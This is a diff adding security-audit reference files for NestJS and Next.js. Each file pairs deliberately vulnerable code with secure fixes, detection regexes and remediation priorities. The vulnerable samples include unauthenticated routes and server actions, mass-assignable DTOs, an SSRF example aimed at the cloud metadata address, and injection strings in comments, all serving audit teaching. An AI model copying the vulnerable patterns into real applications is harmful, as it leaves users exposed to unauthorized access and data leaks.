+| TypeScript any type | `:\s*any\b` | warning | SA-JS-12 |
+| Double type assertion | `as\s+unknown\s+as` | error | SA-JS-13 |
+| Dynamic import with variable | `import\([^)]*\$\{` | error | SA-JS-14 |
+| setInterval with string | `setInterval\(\s*['"\`]` | error | SA-JS-15 |
+| location.href assignment | `location\.href\s*=` | warning | SA-JS-16 |
+| Wildcard postMessage target | `postMessage\([^,]+,\s*['"]\*['"]` | error | SA-JS-17 |
+| Nested regex quantifiers | `(\+\)\+|\*\)\*|\+\)\*)` | warning | SA-JS-18 |
+| strict mode disabled | `"strict"\s*:\s*false` | warning | SA-JS-19 |
+| Unvalidated JSON.parse reviver | `JSON\.parse\([^)]+,\s*\(` | warning | SA-JS-20 |
+
+## Version Adoption Security Checklist
+
+- [ ] Enable `strict: true` in `tsconfig.json` for all TypeScript projects
+- [ ] Replace all `eval()`, `Function()`, and string-form `setTimeout`/`setInterval` with safe alternatives
+- [ ] Audit all `innerHTML`, `outerHTML`, and `document.write` usage for XSS
+- [ ] Validate `event.origin` in all `postMessage` handlers
+- [ ] Replace `Math.random()` with `crypto.getRandomValues()` or `crypto.randomUUID()` for security-sensitive values
+- [ ] Audit all deep-merge utilities and query-string parsers for prototype pollution
+- [ ] Replace `any` types on external input boundaries with `unknown` and runtime validation
+- [ ] Remove all `debugger` statements from production code
+- [ ] Validate dynamic `import()` specifiers against an allowlist
+- [ ] Use branded types for security-critical string values (SQL, HTML, URLs)
+- [ ] Configure ESLint with `no-eval`, `no-implied-eval`, `no-debugger`, and `@typescript-eslint/no-explicit-any`
+- [ ] Audit regex patterns for catastrophic backtracking (nested quantifiers)
+- [ ] Use `satisfies` for configuration objects to catch typos at compile time
+
+## Related References
+
+- `owasp-top10.md` -- OWASP Top 10 mapping
+- `cwe-top25.md` -- CWE Top 25 mapping
+- `input-validation.md` -- Input validation patterns
+- `php-security-features.md` -- PHP security features (for comparison)
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 3 |

--- a/skills/security-audit/references/javascript-typescript-security-features.md
+++ b/skills/security-audit/references/javascript-typescript-security-features.md
@@ -330,7 +330,7 @@ function generateToken() {
 // VULNERABLE: Math.random for CSRF tokens
 const csrfToken = Math.random().toString(16).slice(2);
 
-// SECURE: Use crypto.randomUUID() (Node.js 19+ / modern browsers)
+// SECURE: Use crypto.randomUUID() (Node.js 14.17+ / 16+ / modern browsers)
 const token = crypto.randomUUID();
 
 // SECURE: Use crypto.getRandomValues for byte arrays

--- a/skills/security-audit/references/nestjs-security.md
+++ b/skills/security-audit/references/nestjs-security.md
@@ -1,0 +1,637 @@
+# NestJS Security Patterns
+
+Security patterns, common misconfigurations, and detection regexes for NestJS applications. NestJS provides a structured, decorator-driven architecture on top of Express (or Fastify). Its guard, pipe, interceptor, and filter system offers powerful security primitives, but misconfiguration of these layers -- especially ordering, precedence, and the `@Public()` escape hatch -- is a frequent source of vulnerabilities.
+
+---
+
+## Guard Ordering and Precedence
+
+### SA-NEST-01: Guard Ordering and Precedence
+
+NestJS guards execute in a specific order: global guards first, then controller-level, then method-level. If guards are applied at the wrong level or in the wrong order, authorization checks may be skipped. Combining `@UseGuards()` with global guards can create unexpected precedence issues.
+
+```typescript
+// VULNERABLE: Auth guard only on some methods — others are unprotected
+@Controller('users')
+export class UsersController {
+  @Get()
+  findAll() {
+    // NO guard — any anonymous user can list all users
+    return this.usersService.findAll();
+  }
+
+  @UseGuards(AuthGuard)
+  @Delete(':id')
+  remove(@Param('id') id: string) {
+    return this.usersService.remove(id);
+  }
+}
+
+// VULNERABLE: RolesGuard before AuthGuard — roles checked without auth
+@Controller('admin')
+@UseGuards(RolesGuard, AuthGuard)
+export class AdminController {
+  @Get('dashboard')
+  getDashboard() {
+    // RolesGuard runs first, but user is not authenticated yet!
+    return this.adminService.getDashboard();
+  }
+}
+
+// VULNERABLE: Global guard registered in wrong module
+@Module({
+  providers: [
+    // This only applies to THIS module, not globally
+    { provide: APP_GUARD, useClass: AuthGuard },
+  ],
+})
+export class UsersModule {}
+```
+
+```typescript
+// SECURE: Global auth guard in AppModule with correct ordering
+@Module({
+  providers: [
+    // Global guard — applies to ALL routes
+    { provide: APP_GUARD, useClass: AuthGuard },
+    { provide: APP_GUARD, useClass: RolesGuard }, // Runs after AuthGuard
+  ],
+})
+export class AppModule {}
+
+// SECURE: Controller-level guard with correct ordering
+@Controller('admin')
+@UseGuards(AuthGuard, RolesGuard) // Auth FIRST, then roles
+@Roles('admin')
+export class AdminController {
+  @Get('dashboard')
+  getDashboard() {
+    return this.adminService.getDashboard();
+  }
+}
+
+// SECURE: Guard on every route via controller decorator
+@Controller('users')
+@UseGuards(AuthGuard)
+export class UsersController {
+  @Get()
+  findAll() {
+    // Protected by controller-level guard
+    return this.usersService.findAll();
+  }
+
+  @Delete(':id')
+  @Roles('admin')
+  @UseGuards(RolesGuard) // Additional guard for this route
+  remove(@Param('id') id: string) {
+    return this.usersService.remove(id);
+  }
+}
+```
+
+**Detection regex:** `@UseGuards\s*\(\s*RolesGuard\s*,\s*AuthGuard\s*\)|@Controller\s*\([^)]*\)\s*\nexport\s+class\s+\w+\s*\{(?![\s\S]*?@UseGuards)`
+**Severity:** error
+
+---
+
+## DTO Validation
+
+### SA-NEST-02: DTO Validation (class-validator)
+
+NestJS relies on `class-validator` and `class-transformer` with `ValidationPipe` to validate incoming data. Without the global validation pipe or with `whitelist: false`, attackers can send additional fields that map to entity properties (mass assignment).
+
+```typescript
+// VULNERABLE: No ValidationPipe — DTOs are not validated
+async function bootstrap() {
+  const app = await NestFactory.create(AppModule);
+  // Missing: app.useGlobalPipes(new ValidationPipe());
+  await app.listen(3000);
+}
+
+// VULNERABLE: DTO without validation decorators
+export class CreateUserDto {
+  name: string;       // No @IsString(), no @IsNotEmpty()
+  email: string;      // No @IsEmail()
+  role: string;       // Sensitive field — should not be in DTO
+  isAdmin: boolean;   // Sensitive field — mass assignment!
+}
+
+// VULNERABLE: ValidationPipe without whitelist
+app.useGlobalPipes(new ValidationPipe({
+  whitelist: false,    // Extra properties are NOT stripped
+  transform: true,
+}));
+```
+
+```typescript
+// SECURE: Global ValidationPipe with strict settings
+async function bootstrap() {
+  const app = await NestFactory.create(AppModule);
+  app.useGlobalPipes(new ValidationPipe({
+    whitelist: true,           // Strip properties without decorators
+    forbidNonWhitelisted: true, // Throw on unexpected properties
+    transform: true,            // Auto-transform types
+    disableErrorMessages: false,
+  }));
+  await app.listen(3000);
+}
+
+// SECURE: DTO with explicit validation — no sensitive fields
+import { IsString, IsEmail, IsNotEmpty, MaxLength } from 'class-validator';
+
+export class CreateUserDto {
+  @IsString()
+  @IsNotEmpty()
+  @MaxLength(100)
+  name: string;
+
+  @IsEmail()
+  email: string;
+
+  // role and isAdmin are NOT in the DTO — set server-side
+}
+
+// SECURE: Service sets sensitive fields
+@Injectable()
+export class UsersService {
+  async create(dto: CreateUserDto, currentUser: User) {
+    const user = this.usersRepo.create({
+      ...dto,
+      role: 'user',       // Explicitly set server-side
+      isAdmin: false,     // Explicitly set server-side
+      createdBy: currentUser.id,
+    });
+    return this.usersRepo.save(user);
+  }
+}
+```
+
+**Detection regex:** `new\s+ValidationPipe\s*\(\s*\{[^}]*whitelist\s*:\s*false|class\s+\w+Dto\s*\{(?![\s\S]*?@Is)`
+**Severity:** error
+
+---
+
+## Interceptor Data Transformation
+
+### SA-NEST-03: Interceptor Data Leakage
+
+Interceptors transform responses. Without explicit serialization (e.g., `ClassSerializerInterceptor` or custom transformations), entity objects with sensitive fields (passwords, tokens, internal IDs) may be returned directly to clients.
+
+```typescript
+// VULNERABLE: Entity returned directly — password hash exposed
+@Entity()
+export class User {
+  @PrimaryGeneratedColumn()
+  id: number;
+
+  @Column()
+  email: string;
+
+  @Column()
+  password: string;  // Hash exposed in API response!
+
+  @Column()
+  internalNotes: string;  // Internal data exposed!
+}
+
+@Controller('users')
+export class UsersController {
+  @Get(':id')
+  findOne(@Param('id') id: string) {
+    return this.usersService.findOne(id); // Returns full entity
+  }
+}
+```
+
+```typescript
+// SECURE: Use @Exclude() and ClassSerializerInterceptor
+import { Exclude } from 'class-transformer';
+
+@Entity()
+export class User {
+  @PrimaryGeneratedColumn()
+  id: number;
+
+  @Column()
+  email: string;
+
+  @Column()
+  @Exclude()
+  password: string;  // Excluded from serialization
+
+  @Column()
+  @Exclude()
+  internalNotes: string;  // Excluded from serialization
+}
+
+// Enable globally in main.ts
+app.useGlobalInterceptors(new ClassSerializerInterceptor(app.get(Reflector)));
+
+// Or use a response DTO
+export class UserResponseDto {
+  id: number;
+  email: string;
+  name: string;
+  // password and internalNotes are simply not included
+}
+
+@Controller('users')
+export class UsersController {
+  @Get(':id')
+  async findOne(@Param('id') id: string): Promise<UserResponseDto> {
+    const user = await this.usersService.findOne(id);
+    return plainToInstance(UserResponseDto, user, { excludeExtraneousValues: true });
+  }
+}
+```
+
+**Detection regex:** `@Column\s*\(\s*\)\s*\n\s*password\s*:|@Column\s*\(\s*\)\s*\n\s*(?:secret|token|hash|internal)`
+**Severity:** warning
+
+---
+
+## Pipe Validation Bypass
+
+### SA-NEST-04: Pipe Validation Bypass
+
+`ParseIntPipe`, `ParseUUIDPipe`, and custom pipes validate individual parameters. Omitting these pipes on route parameters allows type confusion attacks, NoSQL injection via object parameters, and integer overflow.
+
+```typescript
+// VULNERABLE: No ParseIntPipe — id could be any string
+@Controller('users')
+export class UsersController {
+  @Get(':id')
+  findOne(@Param('id') id: string) {
+    // id is unvalidated: could be "1 OR 1=1", NaN, or very long string
+    return this.usersService.findOne(id);
+  }
+
+  @Delete(':id')
+  remove(@Param('id') id: string) {
+    // MongoDB: id could be { $ne: null } if parsed from nested query
+    return this.usersService.remove(id);
+  }
+}
+
+// VULNERABLE: Query param without validation
+@Controller('products')
+export class ProductsController {
+  @Get()
+  findAll(@Query('page') page: string, @Query('limit') limit: string) {
+    // page and limit are raw strings — could be negative, huge, or NaN
+    return this.productsService.findAll(+page, +limit);
+  }
+}
+```
+
+```typescript
+// SECURE: Built-in pipes for type safety
+@Controller('users')
+export class UsersController {
+  @Get(':id')
+  findOne(@Param('id', ParseUUIDPipe) id: string) {
+    // Only valid UUIDs pass through
+    return this.usersService.findOne(id);
+  }
+
+  @Delete(':id')
+  remove(@Param('id', ParseIntPipe) id: number) {
+    return this.usersService.remove(id);
+  }
+}
+
+// SECURE: Custom validation pipe for query params
+@Controller('products')
+export class ProductsController {
+  @Get()
+  findAll(
+    @Query('page', new DefaultValuePipe(1), ParseIntPipe) page: number,
+    @Query('limit', new DefaultValuePipe(20), ParseIntPipe) limit: number,
+  ) {
+    const safePage = Math.max(1, page);
+    const safeLimit = Math.min(100, Math.max(1, limit));
+    return this.productsService.findAll(safePage, safeLimit);
+  }
+}
+```
+
+**Detection regex:** `@Param\s*\(\s*['"][^'"]+['"]\s*\)\s+\w+\s*:\s*string(?!\s*,)|@Query\s*\(\s*['"][^'"]+['"]\s*\)\s+\w+\s*:\s*string`
+**Severity:** warning
+
+---
+
+## @Public Decorator Misuse
+
+### SA-NEST-05: @Public Decorator Misuse
+
+When a global `AuthGuard` is registered, the `@Public()` (or `@SkipAuth()`) decorator exempts specific routes. Misapplying this decorator to sensitive endpoints bypasses authentication entirely.
+
+```typescript
+// VULNERABLE: @Public on sensitive endpoints
+@Controller('users')
+export class UsersController {
+  @Public()   // Authentication bypassed!
+  @Get('profile')
+  getProfile() {
+    // This returns the "current user" but there is no current user
+    return this.usersService.getProfile();
+  }
+
+  @Public()   // Authentication bypassed!
+  @Delete(':id')
+  remove(@Param('id') id: string) {
+    return this.usersService.remove(id);
+  }
+}
+
+// VULNERABLE: @Public on entire controller
+@Public()
+@Controller('admin')
+export class AdminController {
+  @Get('users')
+  listUsers() { return this.adminService.listUsers(); }
+
+  @Post('settings')
+  updateSettings(@Body() dto: UpdateSettingsDto) {
+    return this.adminService.updateSettings(dto);
+  }
+}
+```
+
+```typescript
+// SECURE: @Public only on truly public endpoints
+@Controller('users')
+export class UsersController {
+  @Public()
+  @Get('register')
+  showRegistrationForm() {
+    return { message: 'Registration page' };
+  }
+
+  @Public()
+  @Post('login')
+  login(@Body() dto: LoginDto) {
+    return this.authService.login(dto);
+  }
+
+  // No @Public — requires authentication
+  @Get('profile')
+  getProfile(@CurrentUser() user: User) {
+    return this.usersService.getProfile(user.id);
+  }
+
+  @Roles('admin')
+  @Delete(':id')
+  remove(@Param('id', ParseUUIDPipe) id: string) {
+    return this.usersService.remove(id);
+  }
+}
+```
+
+**Detection regex:** `@Public\s*\(\s*\)\s*\n\s*@(Delete|Put|Patch|Post)\s*\(|@Public\s*\(\s*\)\s*\n\s*@Controller`
+**Severity:** error
+
+---
+
+## WebSocket Gateway Auth
+
+### SA-NEST-06: WebSocket Gateway Authentication
+
+NestJS WebSocket gateways (`@WebSocketGateway()`) do not inherit HTTP guards by default. Without explicit authentication in `handleConnection()` or a gateway-level guard, any client can connect and subscribe to events.
+
+```typescript
+// VULNERABLE: No authentication on WebSocket gateway
+@WebSocketGateway()
+export class EventsGateway {
+  @SubscribeMessage('admin:data')
+  handleAdminData(@MessageBody() data: any) {
+    // Any client can subscribe to admin data!
+    return this.adminService.getSensitiveData();
+  }
+
+  @SubscribeMessage('chat:message')
+  handleMessage(@MessageBody() data: any, @ConnectedSocket() client: Socket) {
+    // No auth — anonymous users can send messages as anyone
+    this.server.emit('chat:message', { user: data.user, text: data.text });
+  }
+}
+
+// VULNERABLE: afterInit but not handleConnection
+@WebSocketGateway()
+export class EventsGateway implements OnGatewayInit {
+  afterInit(server: Server) {
+    console.log('Gateway initialized');
+    // This does NOT authenticate individual connections
+  }
+}
+```
+
+```typescript
+// SECURE: Auth in handleConnection and message-level guards
+@WebSocketGateway()
+export class EventsGateway implements OnGatewayConnection {
+  constructor(private authService: AuthService) {}
+
+  async handleConnection(client: Socket) {
+    try {
+      const token = client.handshake.auth?.token
+        || client.handshake.headers?.authorization?.split(' ')[1];
+      if (!token) throw new Error('No token');
+
+      const user = await this.authService.verifyToken(token);
+      client.data.user = user; // Attach user to socket
+    } catch (e) {
+      client.emit('error', { message: 'Unauthorized' });
+      client.disconnect();
+    }
+  }
+
+  @UseGuards(WsAuthGuard)
+  @SubscribeMessage('admin:data')
+  handleAdminData(@ConnectedSocket() client: Socket) {
+    if (client.data.user.role !== 'admin') {
+      throw new WsException('Forbidden');
+    }
+    return this.adminService.getSensitiveData();
+  }
+}
+```
+
+**Detection regex:** `@WebSocketGateway\s*\([\s\S]*?\)[\s\S]*?export\s+class\s+\w+(?![\s\S]*?handleConnection)`
+**Severity:** error
+
+---
+
+## Microservice Transport Security
+
+### SA-NEST-07: Microservice Transport Security
+
+NestJS microservices communicate via transports (TCP, Redis, NATS, gRPC, etc.). Without TLS, authentication, and message validation, inter-service communication is vulnerable to eavesdropping, spoofing, and injection.
+
+```typescript
+// VULNERABLE: TCP transport without TLS
+const app = await NestFactory.createMicroservice(AppModule, {
+  transport: Transport.TCP,
+  options: {
+    host: '0.0.0.0', // Listening on all interfaces
+    port: 3001,
+    // No TLS — plaintext inter-service communication
+  },
+});
+
+// VULNERABLE: Redis transport without auth
+const app = await NestFactory.createMicroservice(AppModule, {
+  transport: Transport.REDIS,
+  options: {
+    host: 'redis-host',
+    port: 6379,
+    // No password, no TLS
+  },
+});
+
+// VULNERABLE: No message validation in handler
+@MessagePattern('user.delete')
+async deleteUser(data: any) {
+  // No validation — trusting inter-service messages blindly
+  return this.usersService.delete(data.userId);
+}
+```
+
+```typescript
+// SECURE: gRPC with TLS
+const app = await NestFactory.createMicroservice(AppModule, {
+  transport: Transport.GRPC,
+  options: {
+    package: 'users',
+    protoPath: join(__dirname, 'users.proto'),
+    credentials: grpc.ServerCredentials.createSsl(
+      fs.readFileSync('ca.pem'),
+      [{ cert_chain: fs.readFileSync('server-cert.pem'),
+         private_key: fs.readFileSync('server-key.pem') }],
+      true,
+    ),
+    url: '0.0.0.0:5000',
+  },
+});
+
+// SECURE: Redis with auth and TLS
+const app = await NestFactory.createMicroservice(AppModule, {
+  transport: Transport.REDIS,
+  options: {
+    host: process.env.REDIS_HOST,
+    port: 6380,
+    password: process.env.REDIS_PASSWORD,
+    tls: { rejectUnauthorized: true },
+  },
+});
+
+// SECURE: Validate microservice messages
+@MessagePattern('user.delete')
+async deleteUser(@Payload(new ValidationPipe()) data: DeleteUserDto) {
+  return this.usersService.delete(data.userId);
+}
+```
+
+**Detection regex:** `Transport\.(TCP|REDIS|NATS)\s*,\s*\n\s*options\s*:\s*\{(?![\s\S]*?tls|[\s\S]*?password)`
+**Severity:** warning
+
+---
+
+## GraphQL Resolver Auth
+
+### SA-NEST-08: GraphQL Resolver Authorization
+
+NestJS GraphQL resolvers are not protected by HTTP guards unless explicitly decorated. Without `@UseGuards()` on resolvers or a global guard, any authenticated or unauthenticated user can query or mutate data.
+
+```typescript
+// VULNERABLE: No guards on resolver
+@Resolver(() => User)
+export class UsersResolver {
+  @Query(() => [User])
+  users() {
+    // Any client can query all users
+    return this.usersService.findAll();
+  }
+
+  @Mutation(() => Boolean)
+  deleteUser(@Args('id') id: string) {
+    // Any client can delete any user
+    return this.usersService.delete(id);
+  }
+}
+
+// VULNERABLE: Guard on query but not mutation
+@Resolver(() => User)
+export class UsersResolver {
+  @UseGuards(GqlAuthGuard)
+  @Query(() => [User])
+  users() {
+    return this.usersService.findAll();
+  }
+
+  // No guard!
+  @Mutation(() => User)
+  updateUser(@Args('input') input: UpdateUserInput) {
+    return this.usersService.update(input);
+  }
+}
+```
+
+```typescript
+// SECURE: Guards on resolver class and sensitive mutations
+@Resolver(() => User)
+@UseGuards(GqlAuthGuard) // All queries/mutations require auth
+export class UsersResolver {
+  @Query(() => [User])
+  users(@CurrentUser() user: User) {
+    return this.usersService.findAll();
+  }
+
+  @Roles('admin')
+  @UseGuards(GqlRolesGuard)
+  @Mutation(() => Boolean)
+  deleteUser(@Args('id') id: string) {
+    return this.usersService.delete(id);
+  }
+
+  @Mutation(() => User)
+  updateUser(
+    @CurrentUser() user: User,
+    @Args('input', new ValidationPipe()) input: UpdateUserInput,
+  ) {
+    // Verify ownership
+    if (input.id !== user.id) throw new ForbiddenException();
+    return this.usersService.update(input);
+  }
+}
+```
+
+**Detection regex:** `@(Mutation|Query)\s*\([^)]*\)\s*\n\s*(?:async\s+)?\w+\s*\((?![\s\S]*?@UseGuards|[\s\S]*?@Roles)`
+**Severity:** error
+
+---
+
+## Remediation Priority
+
+| Finding | Severity | Remediation Timeline | Effort |
+|---------|----------|---------------------|--------|
+| SA-NEST-01 Guard ordering | Critical | Immediate | Low |
+| SA-NEST-02 DTO validation bypass | Critical | Immediate | Medium |
+| SA-NEST-03 Interceptor data leakage | High | 1 week | Medium |
+| SA-NEST-04 Pipe validation bypass | Medium | 1 week | Low |
+| SA-NEST-05 @Public decorator misuse | Critical | Immediate | Low |
+| SA-NEST-06 WebSocket gateway auth | High | 1 week | Medium |
+| SA-NEST-07 Microservice transport | Medium | 1 month | High |
+| SA-NEST-08 GraphQL resolver auth | High | 1 week | Medium |
+
+## Related References
+
+- `owasp-top10.md` -- OWASP Top 10 mapping
+- `api-security.md` -- API-level security patterns
+- NestJS Security documentation: https://docs.nestjs.com/security/authentication
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 3 framework expansion |

--- a/skills/security-audit/references/nestjs-security.md
+++ b/skills/security-audit/references/nestjs-security.md
@@ -205,7 +205,7 @@ export class UsersController {
 
 ```typescript
 // SECURE: Use @Exclude() and ClassSerializerInterceptor
-import { Exclude } from 'class-transformer';
+import { Exclude, plainToInstance } from 'class-transformer';
 
 @Entity()
 export class User {

--- a/skills/security-audit/references/nextjs-security.md
+++ b/skills/security-audit/references/nextjs-security.md
@@ -1,0 +1,721 @@
+# Next.js Security Patterns
+
+Security patterns, common misconfigurations, and detection regexes for Next.js applications. Next.js introduces unique security considerations through its hybrid rendering model (SSR, SSG, ISR), Server Components, Server Actions, API routes, and middleware. Many vulnerabilities arise from the blurred boundary between server and client code.
+
+---
+
+## Authentication & Authorization
+
+### SA-NEXT-01: Server Action Auth Bypass
+
+Server Actions are client-callable RPC endpoints. Without explicit authentication and authorization checks inside each action, any client can invoke them directly, bypassing UI-level guards.
+
+```typescript
+// VULNERABLE: No auth check in server action
+'use server';
+
+import { db } from '@/lib/db';
+
+export async function deleteUser(userId: string) {
+  // Anyone can call this action from the client!
+  await db.user.delete({ where: { id: userId } });
+  return { success: true };
+}
+
+// VULNERABLE: Only checking role on the client side
+'use server';
+
+export async function promoteToAdmin(userId: string) {
+  await db.user.update({
+    where: { id: userId },
+    data: { role: 'admin' },
+  });
+}
+
+// VULNERABLE: No input validation
+'use server';
+
+export async function updateProfile(formData: FormData) {
+  const name = formData.get('name') as string;
+  const email = formData.get('email') as string;
+  await db.user.update({
+    where: { id: formData.get('userId') as string },
+    data: { name, email }, // userId from client = IDOR vulnerability
+  });
+}
+```
+
+```typescript
+// SECURE: Auth + authorization check inside every server action
+'use server';
+
+import { auth } from '@/lib/auth';
+import { db } from '@/lib/db';
+import { z } from 'zod';
+
+const deleteUserSchema = z.object({ userId: z.string().uuid() });
+
+export async function deleteUser(userId: string) {
+  const session = await auth();
+  if (!session?.user) throw new Error('Unauthorized');
+  if (session.user.role !== 'admin') throw new Error('Forbidden');
+
+  const parsed = deleteUserSchema.parse({ userId });
+  await db.user.delete({ where: { id: parsed.userId } });
+  revalidatePath('/admin/users');
+  return { success: true };
+}
+
+// SECURE: Validate ownership, not just authentication
+'use server';
+
+export async function updateProfile(formData: FormData) {
+  const session = await auth();
+  if (!session?.user) throw new Error('Unauthorized');
+
+  const name = z.string().min(1).max(100).parse(formData.get('name'));
+  const email = z.string().email().parse(formData.get('email'));
+
+  // Use session userId, NOT client-provided userId
+  await db.user.update({
+    where: { id: session.user.id },
+    data: { name, email },
+  });
+}
+```
+
+**Detection regex:** `'use server'[\s\S]*?export\s+async\s+function\s+\w+`
+**Severity:** warning
+
+---
+
+### SA-NEXT-02: API Route Auth Bypass
+
+Next.js API routes (both Pages Router `pages/api/` and App Router `app/api/*/route.ts`) are publicly accessible HTTP endpoints. Missing authentication middleware leaves them open to unauthorized access.
+
+```typescript
+// VULNERABLE: No auth in API route (App Router)
+// app/api/users/route.ts
+import { db } from '@/lib/db';
+import { NextResponse } from 'next/server';
+
+export async function GET() {
+  const users = await db.user.findMany();
+  return NextResponse.json(users); // anyone can list all users
+}
+
+export async function DELETE(request: Request) {
+  const { userId } = await request.json();
+  await db.user.delete({ where: { id: userId } });
+  return NextResponse.json({ success: true });
+}
+
+// VULNERABLE: No auth in Pages Router API route
+// pages/api/admin/settings.ts
+export default async function handler(req, res) {
+  if (req.method === 'POST') {
+    await updateSettings(req.body);
+    res.json({ success: true });
+  }
+}
+```
+
+```typescript
+// SECURE: Auth check in API route
+// app/api/users/route.ts
+import { auth } from '@/lib/auth';
+import { db } from '@/lib/db';
+import { NextResponse } from 'next/server';
+
+export async function GET() {
+  const session = await auth();
+  if (!session?.user) {
+    return NextResponse.json({ error: 'Unauthorized' }, { status: 401 });
+  }
+  if (session.user.role !== 'admin') {
+    return NextResponse.json({ error: 'Forbidden' }, { status: 403 });
+  }
+
+  const users = await db.user.findMany({
+    select: { id: true, name: true, email: true },
+  });
+  return NextResponse.json(users);
+}
+
+// SECURE: Middleware-based auth for all API routes
+// middleware.ts
+import { auth } from '@/lib/auth';
+import { NextResponse } from 'next/server';
+
+export async function middleware(request) {
+  const session = await auth();
+  if (!session && request.nextUrl.pathname.startsWith('/api/admin')) {
+    return NextResponse.json({ error: 'Unauthorized' }, { status: 401 });
+  }
+  return NextResponse.next();
+}
+
+export const config = {
+  matcher: ['/api/admin/:path*'],
+};
+```
+
+**Detection regex:** `export\s+async\s+function\s+(GET|POST|PUT|DELETE|PATCH)\s*\(`
+**Severity:** warning
+
+---
+
+## Data Exposure
+
+### SA-NEXT-03: Environment Variable Leakage (NEXT_PUBLIC_*)
+
+Next.js exposes any environment variable prefixed with `NEXT_PUBLIC_` to the client bundle. Accidentally prefixing secrets with `NEXT_PUBLIC_` exposes them to every visitor.
+
+```bash
+# VULNERABLE: .env file with secrets exposed to client
+NEXT_PUBLIC_DATABASE_URL=postgres://user:password@host/db
+NEXT_PUBLIC_API_SECRET=sk_live_abc123xyz
+NEXT_PUBLIC_STRIPE_SECRET_KEY=sk_live_def456
+NEXT_PUBLIC_JWT_SECRET=my-super-secret-jwt-key
+NEXT_PUBLIC_AWS_SECRET_ACCESS_KEY=AKIA1234567890
+```
+
+```typescript
+// VULNERABLE: Using NEXT_PUBLIC_ for server-only values
+const apiClient = axios.create({
+  baseURL: process.env.NEXT_PUBLIC_API_URL,
+  headers: {
+    Authorization: `Bearer ${process.env.NEXT_PUBLIC_API_SECRET}`,
+  },
+});
+```
+
+```bash
+# SECURE: Only public, non-sensitive values get NEXT_PUBLIC_ prefix
+NEXT_PUBLIC_APP_URL=https://myapp.com
+NEXT_PUBLIC_STRIPE_PUBLISHABLE_KEY=pk_live_abc123
+NEXT_PUBLIC_GA_TRACKING_ID=G-XXXXXXXXXX
+
+# Server-only secrets — no NEXT_PUBLIC_ prefix
+DATABASE_URL=postgres://user:password@host/db
+API_SECRET=sk_live_abc123xyz
+STRIPE_SECRET_KEY=sk_live_def456
+JWT_SECRET=my-super-secret-jwt-key
+```
+
+```typescript
+// SECURE: Access secrets only in server-side code
+// lib/stripe.ts (server only)
+import Stripe from 'stripe';
+
+export const stripe = new Stripe(process.env.STRIPE_SECRET_KEY!, {
+  apiVersion: '2024-04-10',
+});
+
+// Validate env vars at build time
+import { z } from 'zod';
+
+const envSchema = z.object({
+  DATABASE_URL: z.string().url(),
+  STRIPE_SECRET_KEY: z.string().startsWith('sk_'),
+  NEXT_PUBLIC_APP_URL: z.string().url(),
+});
+
+export const env = envSchema.parse(process.env);
+```
+
+**Detection regex:** `NEXT_PUBLIC_[A-Z_]*(SECRET|KEY|PASSWORD|TOKEN|CREDENTIAL|PRIVATE|DATABASE)`
+**Severity:** error
+
+---
+
+### SA-NEXT-04: Server Component Data Over-Exposure
+
+Server Components and `getServerSideProps` can access databases and internal services directly. Returning more data than the client needs exposes sensitive fields in the page payload (visible in `__NEXT_DATA__` or RSC payload).
+
+```typescript
+// VULNERABLE: getServerSideProps returns full database record
+// pages/user/[id].tsx
+export async function getServerSideProps({ params }) {
+  const user = await db.user.findUnique({ where: { id: params.id } });
+  return { props: { user } };
+  // user includes: passwordHash, ssn, internalNotes, salary
+}
+
+// VULNERABLE: Server component passes full object to client
+// app/dashboard/page.tsx
+import ClientDashboard from './ClientDashboard';
+
+export default async function DashboardPage() {
+  const analytics = await db.analytics.findMany();
+  // analytics includes internal metrics, cost data, revenue
+  return <ClientDashboard data={analytics} />;
+}
+
+// VULNERABLE: API key in page props via getServerSideProps
+export async function getServerSideProps() {
+  const data = await fetch('https://api.internal.com/data', {
+    headers: { Authorization: `Bearer ${process.env.INTERNAL_API_KEY}` },
+  }).then((r) => r.json());
+
+  return { props: { data, apiKey: process.env.INTERNAL_API_KEY } };
+}
+```
+
+```typescript
+// SECURE: Select only needed fields
+export async function getServerSideProps({ params }) {
+  const user = await db.user.findUnique({
+    where: { id: params.id },
+    select: { id: true, name: true, bio: true, avatarUrl: true },
+  });
+  if (!user) return { notFound: true };
+  return { props: { user } };
+}
+
+// SECURE: Transform data before passing to client
+export default async function DashboardPage() {
+  const analytics = await db.analytics.findMany();
+  const clientData = analytics.map(({ pageViews, uniqueVisitors, date }) => ({
+    pageViews,
+    uniqueVisitors,
+    date: date.toISOString(),
+  }));
+  return <ClientDashboard data={clientData} />;
+}
+
+// SECURE: Never pass API keys to client
+export async function getServerSideProps() {
+  const data = await fetch('https://api.internal.com/data', {
+    headers: { Authorization: `Bearer ${process.env.INTERNAL_API_KEY}` },
+  }).then((r) => r.json());
+
+  return { props: { data } }; // only data, no secrets
+}
+```
+
+**Detection regex:** `(getServerSideProps|getStaticProps)[\s\S]*?return\s*\{\s*props:\s*\{[^}]*(password|secret|token|key|hash|ssn)`
+**Severity:** warning
+
+---
+
+### SA-NEXT-05: Image Optimization SSRF via next/image
+
+The `next/image` component proxies and optimizes external images through `/_next/image`. If the `remotePatterns` or `domains` configuration is overly permissive, attackers can use it as an SSRF proxy to access internal services.
+
+```typescript
+// VULNERABLE: Wildcard remote patterns allow any domain
+// next.config.js
+module.exports = {
+  images: {
+    remotePatterns: [
+      { protocol: 'https', hostname: '**' }, // allows ANY external domain
+    ],
+  },
+};
+
+// VULNERABLE: User-controlled image src without validation
+function UserAvatar({ imageUrl }) {
+  return <Image src={imageUrl} width={100} height={100} alt="avatar" />;
+  // Attacker can pass: http://169.254.169.254/latest/meta-data/
+}
+
+// VULNERABLE: Overly broad domain list
+module.exports = {
+  images: {
+    domains: ['*'], // deprecated but still works — allows everything
+  },
+};
+```
+
+```typescript
+// SECURE: Strict remote patterns with specific hostnames
+// next.config.js
+module.exports = {
+  images: {
+    remotePatterns: [
+      {
+        protocol: 'https',
+        hostname: 'images.mycdn.com',
+        pathname: '/uploads/**',
+      },
+      {
+        protocol: 'https',
+        hostname: 'avatars.githubusercontent.com',
+      },
+    ],
+  },
+};
+
+// SECURE: Validate image URLs before rendering
+import { isAllowedImageHost } from '@/lib/validation';
+
+function UserAvatar({ imageUrl }) {
+  const safeSrc = isAllowedImageHost(imageUrl) ? imageUrl : '/default-avatar.png';
+  return <Image src={safeSrc} width={100} height={100} alt="avatar" />;
+}
+
+function isAllowedImageHost(url: string): boolean {
+  try {
+    const parsed = new URL(url);
